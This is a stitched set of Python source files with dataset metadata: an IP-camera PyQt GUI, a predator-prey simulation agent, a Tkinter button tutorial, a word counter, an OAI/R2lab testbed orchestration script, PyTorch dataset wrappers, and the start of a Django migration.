self.actionSave_as.triggered.connect(self.onActionFilename)\n self.actionAbout.triggered.connect(self.onActionAbout)\n # self.actionHelp.triggered.connect(self.onActionCommands)\n self.record = False\n self.countDown = -1 # If countDown is zero, the video buffer is written to file.\n self.th = Thread()\n self.th.changePixmap.connect(self.setImage) # Defining interrupt routine for QImage data\n self.th.start()\n\n\n def onPushButton1(self):\n self.camera.moveToPositionPreset(1)\n\n def onPushButton2(self):\n self.camera.moveToPositionPreset(2)\n\n def onPushButton3(self):\n self.camera.moveToPositionPreset(3)\n\n def onPushButton4(self):\n self.camera.moveToPositionPreset(4)\n\n def onPushButtonReithalle(self):\n self.camera.moveToPositionPreset(5)\n \n def onPushButtonParken1(self):\n self.camera.moveToPositionPreset(6)\n \n def onPushButtonParken2(self):\n self.camera.moveToPositionPreset(7)\n \n def onPushButtonSnapshot(self):\n password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()\n password_mgr.add_password(None, 'http://'+config.host, config.user, config.password)\n handler = urllib.request.HTTPBasicAuthHandler(password_mgr)\n opener = urllib.request.build_opener(handler)\n opener.open(self.camera.getSnapshot())\n urllib.request.install_opener(opener)\n data = urllib.request.urlopen(self.camera.getSnapshot()).read()\n self.snapshot = QPixmap()\n self.snapshot.loadFromData(data)\n self.onActionFilename()\n\n def onActionFilename(self): \n options = QFileDialog.Options()\n #options |= QFileDialog.DontUseNativeDialog\n # jpgFile, _ = QFileDialog.getSaveFileName(self,\"Select file:\" , \"D:\\\\Daten\\\\*.jpg\", options=options)\n jpgFile = 'pic_'+time.strftime(\"%Y%m%d_%H%M%S\")+'.jpg'\n if jpgFile:\n self.snapshot.save(jpgFile)\n \n def onActionAbout(self):\n print(\"About ...\")\n QMessageBox.about(self, \"About\",\n \"\"\"Testing routines to control an IP camera.\n (@MLU-WFW)\"\"\")\n\n @pyqtSlot(QImage)\n def setImage(self, image):\n '''Plots the 
QImage argument on the label 'labelFrame'. \n Interrupt routine to accept QImage data and to push them to a label.'''\n self.pixMap = QPixmap.fromImage(image)\n self.labelFrame.setPixmap(self.pixMap)\n\n def setupCam(self):\n self.camera = cam.MegapixelDomeCamera(config.host, config.port, config.user, config.password)\n\n def onRecord(self):\n if not self.record:\n self.saveVideoStart()\n self.pushButtonRecord.setStyleSheet(\"background-color:yellow;\")\n self.pushButtonRecord.setText(\"Stop\")\n else:\n self.saveVideoStopp()\n self.pushButtonRecord.setText(\"Record\")\n self.pushButtonRecord.setStyleSheet(\"background-color:white;\")\n\n def saveVideoStart(self): \n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n file = 'vid_'+time.strftime(\"%Y%m%d_%H%M%S\")+'.avi'\n self.out = cv2.VideoWriter(file,fourcc, 25.0, self.th.size)\n self.record = True\n\n def saveVideoStopp(self): \n self.record = False\n self.out.release()\n\n def onTest(self):\n self.countDown = 50 # Count the next 50 frames. 
Afterwards the video buffer is written to file.\n \n def writeVideoBuffer(self):\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n file = 'snap_'+time.strftime(\"%Y%m%d_%H%M%S\")+'.avi'\n outSnap = cv2.VideoWriter(file,fourcc, 25.0, self.th.size)\n for i in range(min(100,len(self.th.que))):\n outSnap.write(self.th.que.popleft())\n outSnap.release()\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = MyWindow()\n ui.setupUi(MainWindow)\n ui.setupCam()\n ui.myModifications()\n MainWindow.show()\n sys.exit(app.exec_())","sub_path":"GUI_DomeCamera2.py","file_name":"GUI_DomeCamera2.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"431625411","text":"import grass_class\nimport fire_class\nimport dirt_class\nimport tree_class\nimport sheep_class\nfrom settings import TILE_SIZE\nfrom settings import GAME_SIZE\nimport settings\nimport numpy as np\nimport random\nimport math\nimport animal\nimport game\n\n\nclass wolf(animal.animal):\n def __init__(self, x, y, colour, range, food, tile):\n super().__init__(x, y, colour, range, food, tile)\n\n def cycle(self, environment, round):\n if self.food == 0:\n return self.starve()\n\n sheep_location = self.get_location_of_object(sheep_class.sheep, environment)\n\n if round == 0:\n move_x = random.randrange(-1, 2, 1)\n move_y = random.randrange(-1, 2, 1)\n\n else:\n if len(sheep_location) != 0:\n best_move = self.chooseMove(environment)\n #print(\"BEST MOVE IS : \"+str(best_move))\n move_y = best_move[0]\n move_x = best_move[1]\n else:\n move_x = random.randrange(-1, 2, 1)\n move_y = random.randrange(-1, 2, 1)\n\n if self.x < TILE_SIZE:\n move_x += 1\n elif self.x >= GAME_SIZE-(TILE_SIZE+1):\n move_x -= 1\n if self.y < TILE_SIZE:\n move_y += 1\n elif self.y >= GAME_SIZE-(TILE_SIZE+1):\n move_y -= 1\n i, j = 0, 0\n for rows in environment:\n for element in rows:\n 
if(element != None):\n if self.x-1 <= element.x <= self.x+1 or self.y-1 <= element.y <= self.y+1:\n if isinstance(element, fire_class.fire) and settings.WEATHER != \"Rain\" and -1 <=j<=1 and -1<=i<=1:\n return self.burn() #if sheep is adjacent to fire, 50% chance it burns\n j += 1\n j = self.range * -1\n i += 1\n return self.move(self.x + (move_x * TILE_SIZE), self.y + (move_y * TILE_SIZE))\n\n def chooseMove(self, environment):\n # wolves have the ability to move 8 direction instead of 4 like sheep\n move = [(-1, 0), (-1, -1), (-1, 1), (1, 0), (1, -1), (1, 1), (0, -1), (0, 1)]\n grass_locations = self.get_location_of_object(grass_class.grass, environment)\n tree_location = self.get_location_of_object(tree_class.tree, environment)\n fire_location = self.get_location_of_object(fire_class.fire, environment)\n sheep_location = self.get_location_of_object(sheep_class.sheep, environment)\n wolf_location = self.get_location_of_object(wolf, environment)\n\n if len(fire_location) > 0:\n print(fire_location)\n for element in fire_location:\n # because the wolves can move diagonally the Euclidian distance is a better heuristic\n l = self.move_calc(element, move)\n\n heur = (l.index(min(l)), (min(l)))\n\n try:\n if heur[1] < h1[1]:\n h1 = heur\n except:\n h1 = heur\n opp = move[h1[0]]\n print('wolf')\n print(opp)\n opp = (opp[0]*-1, opp[1]*-1)\n print(opp)\n return opp\n else:\n for element in sheep_location:\n # because the wolves can move diagonally the Euclidian distance is a better heuristic\n l = self.move_calc(element, move)\n\n heur = (l.index(min(l)), (min(l)))\n\n try:\n if heur[1] < h1[1]:\n h1 = heur\n except:\n h1 = heur\n\n return move[h1[0]]\n\n def move_calc(self, element, move):\n up = math.sqrt((move[0][0] - element[0])**2 + (move[0][1] - element[1])**2)\n up_left = math.sqrt((move[1][0] - element[0])**2 + (move[1][1] - element[1])**2)\n up_right = math.sqrt((move[2][0] - element[0])**2 + (move[2][1] - element[1])**2)\n down = math.sqrt((move[3][0] - 
element[0])**2 + (move[3][1] - element[1])**2)\n down_left = math.sqrt((move[4][0] - element[0])**2 + (move[4][1] - element[1])**2)\n down_right = math.sqrt((move[5][0] - element[0])**2 + (move[5][1] - element[1])**2)\n left = math.sqrt((move[6][0] - element[0])**2 + (move[6][1] - element[1])**2)\n right = math.sqrt((move[7][0] - element[0])**2 + (move[7][1] - element[1])**2)\n\n return [up, up_left, up_right, down, down_left, down_right, left, right]\n","sub_path":"wolf_class.py","file_name":"wolf_class.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"172744291","text":"# coding=utf-8\nfrom tkinter import *\n\n# 定义Button的事件处理函数\n\n\ndef hello_button(): # 每点击一次button,程序打印hello button\n import random\n text = ['小隙沉舟,同心方可戮力', '读诗书,尚礼仪,守纲常', '宁为玉碎,不能瓦全']\n print(text[random.randint(0, 2)])\nroot = Tk()\n\n\nbutton1 = Button(root, text='Hello Button', command=hello_button)\nbutton1.pack()\n\nbutton2 = Button(root, text=\"Hello Button\", relief=FLAT) # 失去了button的作用\nbutton2.pack()\n\n# 设置button的外观(flat,groove,raised,ridge,solid,sunken)\nbutton3 = Button(root, text='Hello button', relief=SUNKEN, command=hello_button)\nbutton3.pack()\n\n# button显示图像\n# image:可以使用gif图像 img=PhotoImage(root, file=filepath)\n# button4 = Button(root, Image=PhotoImage(root, file=r'C:\\Users\\xilig\\Pictures\\1.gif'))\n# button4.pack()\n# root.mainloop()\n\n# button显示文本与图像,和text同理\n\n\ndef cb1():\n print('button1 clicked')\n\n\ndef cb2(event):\n print(event)\n print('button2 clicked')\n\n\ndef cb3():\n print('button3 clicked')\n\nbutton4 = Button(root, text='Button4', command=cb1)\nbutton4.pack()\nbutton5 = Button(root, text='Button5')\nbutton5.bind(\"\", cb2)\nbutton5.pack()\nbutton5.focus_set()\nbutton6 = Button(root, text='button6', command=cb3)\nbutton6.pack()\n\n# button的高与宽三种方法:Button(root,width=30,height=8),button1['width']=30,button1.configure(width=30,height=3)\n\n# 
设置Button文本在控件上的显示位置\nfor a in ['n', 's', 'e', 'w', 'ne', 'nw', 'se', 'sw']:\n Button(root, text='anchor', anchor=a, width=30, height=1).pack()\n\n# 设置Button的边框\nfor b in range(5):\n Button(root, text=str(b), bd=b).pack()\n\n# 设置Button状态 normal active disabled\n\n\ndef state_print():\n print('state')\nfor r in ['normal', 'active', 'disabled']:\n Button(root, text=r, state=r, width=30, command=state_print).pack()\n\n\n# 绑定Button与变量V,当V变化时,button显示的文本也随之变化\ndef change_text():\n if b['text'] == 'text':\n v.set('change')\n print('change')\n else:\n v.set('text')\n print('text')\nv = StringVar()\nb = Button(root, textvariable=v, command=change_text)\nv.set('text')\nb.pack()\nroot.mainloop()\n","sub_path":"Python/Tkinter_/button_.py","file_name":"button_.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"640873214","text":"import collections #计数器\nimport os\nimport string\n\npath = \"/Users/U/workspace/python learning/show-me-the-code/0006/diary/\" #diary dir\ndir = os.listdir(path) #读取目录\nsum = 0 #单词总数\nwanna = 'I' #想要统计的单词\nfor file in dir: #遍历目录\n with open(path + file) as diary:\n list = diary.read().split(' ') #单词以空格分开\n newlist = [word.translate(word.maketrans(\"\",\"\",string.punctuation)) for word in list] #干掉所有标点符号\n # 用maketrans创建一个映射表 translate根据映射表转化字符串\n sum += int(collections.Counter(newlist)[wanna]) #统计所以日记中单词\"I\"的个数\n # print(newlist) #test newlist\nprint('%s:%d' % (wanna,sum))\n","sub_path":"0007/test/0006.py","file_name":"0006.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616675126","text":"#!/usr/bin/env python3\n\n# pylint: disable=c0111, w0622\n\nimport os.path\nimport time\nimport asyncio\nimport itertools\nfrom collections import defaultdict\n\nfrom asynciojobs import Scheduler, Job, Sequence\n\nfrom apssh import SshNode, SshJob, Run, RunScript, 
Pull\nfrom apssh import LocalNode\nfrom apssh.formatters import TimeHostFormatter\n\n\n# illustrating the r2lab library\n# utils\nfrom r2lab import r2lab_hostname, r2lab_parse_slice, find_local_embedded_script\n# argument parsing\nfrom r2lab import ListOfChoices, ListOfChoicesNullReset\n\nfrom probe_map import hardwired_hardware_map, probe_hardware_map, show_hardware_map\n\n\n# include the set of utility scripts that are included by the r2lab kit\nINCLUDES = [find_local_embedded_script(x) for x in [\n \"r2labutils.sh\", \"nodes.sh\", \"oai-common.sh\",\n]]\n\n\n# first stage\n\n\n# pylint: disable=r0912, r0914, r0915\ndef run(*,\n # the pieces to use\n slice, hss, epc, enb, phones,\n e3372_ues, oai_ues, gnuradios,\n e3372_ue_xterms, oai_ue_xterms, gnuradio_xterms,\n # boolean flags\n load_nodes, skip_reset_usb, oscillo,\n # the images to load\n image_gw, image_enb, image_oai_ue, image_e3372_ue, image_gnuradio,\n # miscell\n n_rb, verbose, dry_run):\n \"\"\"\n ##########\n # 3 methods to get nodes ready\n # (*) load images\n # (*) reset nodes that are known to have the right image\n # (*) do nothing, proceed to experiment\n\n expects e.g.\n * slice : s.t like inria_oai.skype@faraday.inria.fr\n * hss : 04\n * epc : 03\n * enb : 23\n * phones: list of indices of phones to use\n\n * e3372_ues : list of nodes to use as a UE using e3372\n * oai_ues : list of nodes to use as a UE using OAI\n * gnuradios : list of nodes to load with a gnuradio image\n\n * image_* : the name of the images to load on the various nodes\n\n Plus\n * load_nodes: whether to load images or not - in which case\n image_gw, image_enb and image_*\n are used to tell the image names\n * skip_reset_usb : the USRP board will be reset as well unless this is set\n \"\"\"\n\n # what argparse knows as a slice actually is a gateway (user + host)\n gwuser, gwhost = r2lab_parse_slice(slice)\n gwnode = SshNode(hostname=gwhost, username=gwuser,\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n\n 
hostnames = hssname, epcname, enbname = [\n r2lab_hostname(x) for x in (hss, epc, enb)]\n\n optional_ids = e3372_ues + oai_ues + gnuradios + \\\n e3372_ue_xterms + oai_ue_xterms + gnuradio_xterms\n\n hssnode, epcnode, enbnode = [\n SshNode(gateway=gwnode, hostname=hostname, username='root',\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n for hostname in hostnames\n ]\n\n sched = Scheduler(verbose=verbose)\n\n # preparation\n job_check_for_lease = SshJob(\n node=gwnode,\n command=[\"rhubarbe\", \"leases\", \"--check\"],\n label=\"check we have a current lease\",\n scheduler=sched,\n )\n\n # turn off all nodes\n turn_off_command = [\"rhubarbe\", \"off\", \"-a\"]\n\n # except our 3 nodes and the optional ones\n turn_off_command += [f\"~{x}\" for x in [hss, epc, enb] + optional_ids]\n\n # only do the turn-off thing if load_nodes\n if load_nodes:\n job_off_nodes = SshJob( # pylint: disable=w0612\n node=gwnode,\n # switch off all nodes but the ones we use\n command=turn_off_command,\n label=\"turn off unused nodes\",\n required=job_check_for_lease,\n scheduler=sched,\n )\n\n # actually run this in the gateway, not on the macphone\n # the ssh keys are stored in the gateway and we do not yet have\n # the tools to leverage such remote keys\n job_stop_phones = [SshJob( # pylint: disable=w0612\n node=gwnode,\n command=RunScript(\n # script\n find_local_embedded_script(\"faraday.sh\"),\n # arguments\n f\"macphone{id}\", \"r2lab-embedded/shell/macphone.sh\", \"phone-off\",\n # options\n includes=INCLUDES),\n label=f\"put phone{id} in airplane mode\",\n required=job_check_for_lease,\n scheduler=sched,\n ) for id in phones]\n\n # prepare the image-loading phase\n # this will be a dict of items imagename -> ids\n to_load = defaultdict(list)\n to_load[image_gw] += [hss, epc]\n to_load[image_enb] += [enb]\n if e3372_ues:\n to_load[image_e3372_ue] += e3372_ues\n if e3372_ue_xterms:\n to_load[image_e3372_ue] += e3372_ue_xterms\n if oai_ues:\n to_load[image_oai_ue] += 
oai_ues\n if oai_ue_xterms:\n to_load[image_oai_ue] += oai_ue_xterms\n if gnuradios:\n to_load[image_gnuradio] += gnuradios\n if gnuradio_xterms:\n to_load[image_gnuradio] += gnuradio_xterms\n\n prep_job_by_node = {}\n for image, nodes in to_load.items():\n commands = []\n if load_nodes:\n commands.append(Run(\"rhubarbe\", \"usrpoff\", *nodes))\n commands.append(Run(\"rhubarbe\", \"load\", \"-i\", image, *nodes))\n commands.append(Run(\"rhubarbe\", \"usrpon\", *nodes))\n # always do this\n commands.append(Run(\"rhubarbe\", \"wait\", \"-t\", 120, *nodes))\n job = SshJob(\n node=gwnode,\n commands=commands,\n label=f\"Prepare node(s) {nodes}\",\n required=job_check_for_lease,\n scheduler=sched,\n )\n for node in nodes:\n prep_job_by_node[node] = job\n\n # start services\n job_service_hss = SshJob(\n node=hssnode,\n command=RunScript(find_local_embedded_script(\"oai-hss.sh\"), \"run-hss\", epc,\n includes=INCLUDES),\n label=\"start HSS service\",\n required=prep_job_by_node[hss],\n scheduler=sched,\n )\n\n delay = 15\n job_service_epc = SshJob(\n node=epcnode,\n commands=[\n Run(f\"echo giving HSS a headstart {delay}s to warm up; sleep {delay}\"),\n RunScript(find_local_embedded_script(\"oai-epc.sh\"), \"run-epc\", hss,\n includes=INCLUDES),\n ],\n label=\"start EPC services\",\n required=prep_job_by_node[epc],\n scheduler=sched,\n )\n\n # enodeb\n\n job_warm_enb = SshJob(\n node=enbnode,\n commands=[\n RunScript(find_local_embedded_script(\"oai-enb.sh\"),\n \"warm-enb\", epc, n_rb, not skip_reset_usb,\n includes=INCLUDES),\n ],\n label=\"Warm eNB\",\n required=prep_job_by_node[enb],\n scheduler=sched,\n )\n\n enb_requirements = (job_warm_enb, job_service_hss, job_service_epc)\n\n # wait for everything to be ready, and add an extra grace delay\n\n grace = 30 if load_nodes else 10\n grace_delay = SshJob(\n node=LocalNode(formatter=TimeHostFormatter()),\n command=f\"echo Allowing grace of {grace} seconds; sleep {grace}\",\n required=enb_requirements,\n 
scheduler=sched,\n )\n\n # start services\n\n job_service_enb = SshJob( # pylint: disable=w0612\n node=enbnode,\n # run-enb expects the id of the epc as a parameter\n # n_rb means number of resource blocks for DL, set to either 25 or 50.\n commands=[\n RunScript(find_local_embedded_script(\"oai-enb.sh\"),\n \"run-enb\", oscillo,\n includes=INCLUDES,\n x11=oscillo\n ),\n ],\n label=\"start softmodem on eNB\",\n required=grace_delay,\n scheduler=sched,\n )\n\n # run experiment per se\n # Manage phone(s)\n # this starts at the same time as the eNB, but some\n # headstart is needed so that eNB actually is ready to serve\n delay = 12\n msg = f\"wait for {delay}s for enodeb to start up\"\n wait_command = f\"echo {msg}; sleep {delay}\"\n\n job_start_phones = [SshJob( # pylint: disable=w0612\n node=gwnode,\n commands=[\n Run(wait_command),\n RunScript(find_local_embedded_script(\"faraday.sh\"),\n f\"macphone{id}\", \"r2lab-embedded/shell/macphone.sh\", \"phone-on\",\n includes=INCLUDES),\n RunScript(find_local_embedded_script(\"faraday.sh\"),\n f\"macphone{id}\", \"r2lab-embedded/shell/macphone.sh\", \"phone-start-app\",\n includes=INCLUDES),\n ],\n label=\"start Nexus phone and speedtest app\",\n required=grace_delay,\n scheduler=sched,\n ) for id in phones]\n\n job_ping_phones_from_epc = [SshJob( # pylint: disable=w0612\n node=epcnode,\n commands=[\n Run(\"sleep 10\"),\n Run( f\"ping -c 100 -s 100 -i .05 172.16.0.{id+1} &> /root/ping-phone\"),\n ],\n label=\"ping Nexus phone from EPC\",\n critical=False,\n required=job_start_phones,\n ) for id in phones]\n\n # xterm nodes\n\n colors = [\"wheat\", \"gray\", \"white\", \"darkolivegreen\"]\n\n xterms = e3372_ue_xterms + oai_ue_xterms + gnuradio_xterms\n\n for xterm, color in zip(xterms, itertools.cycle(colors)):\n xterm_node = SshNode(\n gateway=gwnode, hostname=r2lab_hostname(xterm), username='root',\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n SshJob(\n node=xterm_node,\n command=Run(f\"xterm -fn 
-*-fixed-medium-*-*-*-20-*-*-*-*-*-*-*\"\n f\" -bg {color} -geometry 90x10\",\n x11=True),\n label=\"xterm on node {xterm_node.hostname}\",\n required=prep_job_by_node[xterm],\n scheduler=sched,\n # don't set forever; if we do, then these xterms get killed\n # when all other tasks have completed\n # forever = True,\n )\n# # remove dangling requirements - if any - should not be needed but won't hurt either\n sched.sanitize()\n\n print(20*\"*\", \"nodes usage summary\")\n if load_nodes:\n for image, nodes in to_load.items():\n for node in nodes:\n print(f\"node {node} : {image}\")\n else:\n print(\"NODES ARE USED AS IS (no image loaded, no reset)\")\n print(10*\"*\", \"phones usage summary\")\n if phones:\n for phone in phones:\n print(f\"Using phone{phone}\")\n else:\n print(\"No phone involved\")\n\n sched.check_cycles()\n # Update the .dot and .png file for illustration purposes\n if verbose or dry_run:\n sched.list()\n name = \"scenario-load\" if load_nodes else \\\n \"scenario\"\n sched.export_as_dotfile(f\"{name}.dot\")\n os.system(f\"dot -Tpng {name}.dot -o {name}.png\")\n print(f\"(Over)wrote {name}.png\")\n\n if dry_run:\n return False\n\n if verbose:\n input('OK ? - press control C to abort ? 
')\n\n if not sched.orchestrate():\n print(f\"RUN KO : {sched.why()}\")\n sched.debrief()\n return False\n else:\n print(\"RUN OK\")\n return True\n\n# use the same signature in addition to run_name by convenience\n\n\ndef collect(run_name, slice, hss, epc, enb, verbose):\n \"\"\"\n retrieves all relevant logs under a common name\n otherwise, same signature as run() for convenience\n\n retrieved stuff will be 3 compressed tars named\n -(hss|epc|enb).tar.gz\n \"\"\"\n\n gwuser, gwhost = r2lab_parse_slice(slice)\n gwnode = SshNode(hostname=gwhost, username=gwuser,\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n\n functions = \"hss\", \"epc\", \"enb\"\n\n hostnames = hssname, epcname, enbname = [\n r2lab_hostname(x) for x in (hss, epc, enb)]\n\n nodes = hssnode, epcnode, enbnode = [\n SshNode(gateway=gwnode, hostname=hostname, username='root',\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n for hostname in hostnames\n ]\n\n # first run a 'capture' function remotely to gather all the relevant\n # info into a single tar named .tgz\n\n capturers = [\n SshJob(\n node=node,\n command=RunScript(find_local_embedded_script(\"oai-common.sh\"),\n f\"capture-{function}\", run_name,\n includes=[find_local_embedded_script(\n f\"oai-{function}.sh\")]),\n label=f\"capturer on {function}\",\n # capture-enb will run oai-as-enb and thus requires oai-enb.sh\n )\n for (node, function) in zip(nodes, functions)]\n\n collectors = [\n SshJob(\n node=node,\n command=Pull(remotepaths=[f\"{run_name}-{function}.tgz\"],\n localpath=\".\"),\n label=f\"collector on {function}\",\n required=capturers,\n )\n for (node, function, capturer) in zip(nodes, functions, capturers)]\n\n sched = Scheduler(verbose=verbose)\n sched.update(capturers)\n sched.update(collectors)\n\n if verbose:\n sched.list()\n\n if not sched.orchestrate():\n print(\"KO\")\n sched.debrief()\n return\n print(\"OK\")\n if os.path.exists(run_name):\n print(f\"local directory {run_name} already exists 
= NOT UNWRAPPED !\")\n return\n os.mkdir(run_name)\n local_tars = [ f\"{run_name}-{ext}.tgz\" for ext in ['hss', 'epc', 'enb']]\n for tar in local_tars:\n print(f\"Untaring {tar} in {run_name}\")\n os.system(f\"tar -C {run_name} -xzf {tar}\")\n\n\ndef main():\n\n hardware_map = hardwired_hardware_map()\n\n def_slice = \"inria_oai@faraday.inria.fr\"\n # WARNING: initially we used 37 and 36 for hss and epc,\n # but these boxes now have a USRP N210 and can't use the data network anymore\n def_hss, def_epc, def_enb = 7, 8, 23\n\n def_image_gw = \"oai-cn\"\n def_image_enb = \"oai-enb\"\n def_image_gnuradio = \"gnuradio\"\n def_image_oai_ue = \"oai-ue\"\n def_image_e3372_ue = \"e3372-ue\"\n\n # raw formatting (for -x mostly) + show defaults\n from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter, RawTextHelpFormatter\n\n class RawAndDefaultsFormatter(ArgumentDefaultsHelpFormatter, RawTextHelpFormatter):\n pass\n parser = ArgumentParser(formatter_class=RawAndDefaultsFormatter)\n\n parser.add_argument(\"-s\", \"--slice\", default=def_slice,\n help=\"slice to use for entering\")\n\n parser.add_argument(\"--hss\", default=def_hss,\n help=\"id of the node that runs the HSS\")\n parser.add_argument(\"--epc\", default=def_epc,\n help=\"id of the node that runs the EPC\")\n parser.add_argument(\"--enb\", default=def_enb,\n help=\"\"\"id of the node that runs the eNodeB',\nrequires a USRP b210 and 'duplexer for eNodeB'\"\"\")\n\n parser.add_argument(\"-p\", \"--phones\", dest='phones',\n action=ListOfChoicesNullReset, type=int, choices=(\n 1, 2, 0),\n default=[1],\n help='Commercial phones to use; use -p 0 to choose no phone')\n\n e3372_nodes = hardware_map['E3372-UE']\n parser.add_argument(\"-E\", \"--e3372\", dest='e3372_ues', default=[],\n action=ListOfChoices, type=int, choices=e3372_nodes,\n help=f\"\"\"id(s) of nodes to be used as a E3372-based UE\nchoose among {e3372_nodes}\"\"\")\n parser.add_argument(\"-e\", \"--e3372-xterm\", dest='e3372_ue_xterms', 
default=[],\n action=ListOfChoices, type=int, choices=e3372_nodes,\n help=\"\"\"likewise, with an xterm on top\"\"\")\n\n oaiue_nodes = hardware_map['OAI-UE']\n parser.add_argument(\"-U\", \"--oai-ue\", dest='oai_ues', default=[],\n action=ListOfChoices, type=int, choices=oaiue_nodes,\n help=f\"\"\"id(s) of nodes to be used as a OAI-based UE\nchoose among {oaiue_nodes} - note that these notes are also\nsuitable for scrambling the 2.54 GHz uplink\"\"\")\n parser.add_argument(\"-u\", \"--oai-ue-xterm\", dest='oai_ue_xterms', default=[],\n action=ListOfChoices, type=int, choices=oaiue_nodes,\n help=\"\"\"likewise, with an xterm on top\"\"\")\n\n # xxx could use choices here too\n parser.add_argument(\"-G\", \"--gnuradio\", dest='gnuradios', default=[], action='append',\n help=\"\"\"id(s) of nodes intended to run gnuradio;\nprefer using fit10 and fit11 (B210 without duplexer)\"\"\")\n parser.add_argument(\"-g\", \"--gnuradio-xterm\", dest='gnuradio_xterms', default=[], action='append',\n help=\"\"\"likewise, with an xterm on top\"\"\")\n\n parser.add_argument(\"-l\", \"--load\", dest='load_nodes', action='store_true', default=False,\n help='load images as well')\n parser.add_argument(\"-f\", \"--fast\", dest=\"skip_reset_usb\",\n default=False, action='store_true',\n help=\"\"\"Skip resetting the USB boards if set\"\"\")\n\n parser.add_argument(\"-o\", \"--oscillo\", dest='oscillo',\n action='store_true', default=False,\n help='run eNB with oscillo function; no oscillo by default')\n\n parser.add_argument(\"--image-gw\", default=def_image_gw,\n help=\"image to load in hss and epc nodes\")\n parser.add_argument(\"--image-enb\", default=def_image_enb,\n help=\"image to load in enb node\")\n parser.add_argument(\"--image-e3372-ue\", default=def_image_e3372_ue,\n help=\"image to load in e3372 UE nodes\")\n parser.add_argument(\"--image-oai-ue\", default=def_image_oai_ue,\n help=\"image to load in OAI UE nodes\")\n parser.add_argument(\"--image-gnuradio\", 
default=def_image_gnuradio,\n help=\"image to load in gnuradio nodes\")\n\n parser.add_argument(\"-N\", \"--n-rb\", dest='n_rb',\n default=25,\n type=int,\n choices=[25, 50],\n help=\"specify the Number of Resource Blocks (NRB) for the downlink\")\n\n parser.add_argument(\"-m\", \"--map\", default=False, action='store_true',\n help=\"\"\"Probe the testbed to get an updated hardware map\nthat shows the nodes that currently embed the\ncapabilities to run as either E3372- and\nOpenAirInterface-based UE. Does nothing else.\"\"\")\n\n parser.add_argument(\"-v\", \"--verbose\", action='store_true', default=False)\n parser.add_argument(\"-n\", \"--dry-run\", action='store_true', default=False)\n\n args = parser.parse_args()\n\n if args.map:\n show_hardware_map(probe_hardware_map())\n exit(0)\n\n # map is not a recognized parameter in run()\n delattr(args, 'map')\n\n # we pass to run and collect exactly the set of arguments known to parser\n # build a dictionary with all the values in the args\n kwds = args.__dict__.copy()\n\n # actually run it\n print(f\"Experiment STARTING at {time.strftime('%H:%M:%S')}\")\n if not run(**kwds):\n print(\"exiting\")\n return\n\n print(f\"Experiment READY at {time.strftime('%H:%M:%S')}\")\n # then prompt for when we're ready to collect\n try:\n run_name = input(\"type capture name when ready : \")\n if not run_name:\n raise KeyboardInterrupt\n collect(run_name, args.slice, args.hss,\n args.epc, args.enb, args.verbose)\n except KeyboardInterrupt as e:\n print(\"OK, skipped collection, bye\")\n\n # this should maybe be taken care of in asynciojobs\n asyncio.get_event_loop().close()\n\n\nmain()\n","sub_path":"openair/oai-scenario.py","file_name":"oai-scenario.py","file_ext":"py","file_size_in_byte":19607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"409993809","text":"from torch.utils import data\nfrom torchvision import datasets, transforms\n\ncifar_transforms = 
transforms.Compose([\n transforms.Grayscale(),\n transforms.ToTensor(),\n])\nfashionmnist_transforms = transforms.Compose([\n transforms.Grayscale(),\n transforms.ToTensor(),\n])\n\n\nclass Cifar10(data.Dataset):\n def __init__(self, root, train=True):\n self.dataset = datasets.CIFAR10(root,\n train=train,\n transform=cifar_transforms,\n download=True)\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, idx):\n image, label = self.dataset[idx]\n return image, label\n\n\nclass FashionMNIST(data.Dataset):\n def __init__(self, root, train=True):\n self.dataset = datasets.FashionMNIST(root,\n train=train,\n transform=fashionmnist_transforms,\n download=True)\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, idx):\n image, label = self.dataset[idx]\n return image, label\n\n\nclass TwoClassCifar10(data.Dataset):\n def __init__(self, root, train=True):\n self.image_list = []\n self.label_list = []\n dataset = datasets.CIFAR10(root,\n train=train,\n transform=cifar_transforms,\n download=True)\n for image, label in dataset:\n if label in [3, 5]:\n self.image_list.append(image)\n if label == 3:\n self.label_list.append(0)\n elif label == 5:\n self.label_list.append(1)\n\n def __len__(self):\n return len(self.image_list)\n\n def __getitem__(self, idx):\n image = self.image_list[idx]\n label = self.label_list[idx]\n return image, label","sub_path":"Assignments/Homework 3/q2/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25014174","text":"\nimport datetime\n\nfrom south.db import db\nfrom django.db import models\n\nfrom ella.core.migrations.base.base_0002 import BasePublishableDataMigration\nfrom ella.core.migrations.base.base_0002 import alter_foreignkey_to_int, migrate_foreignkey\n\n\nclass Migration(BasePublishableDataMigration):\n models = dict.copy(BasePublishableDataMigration.models)\n 
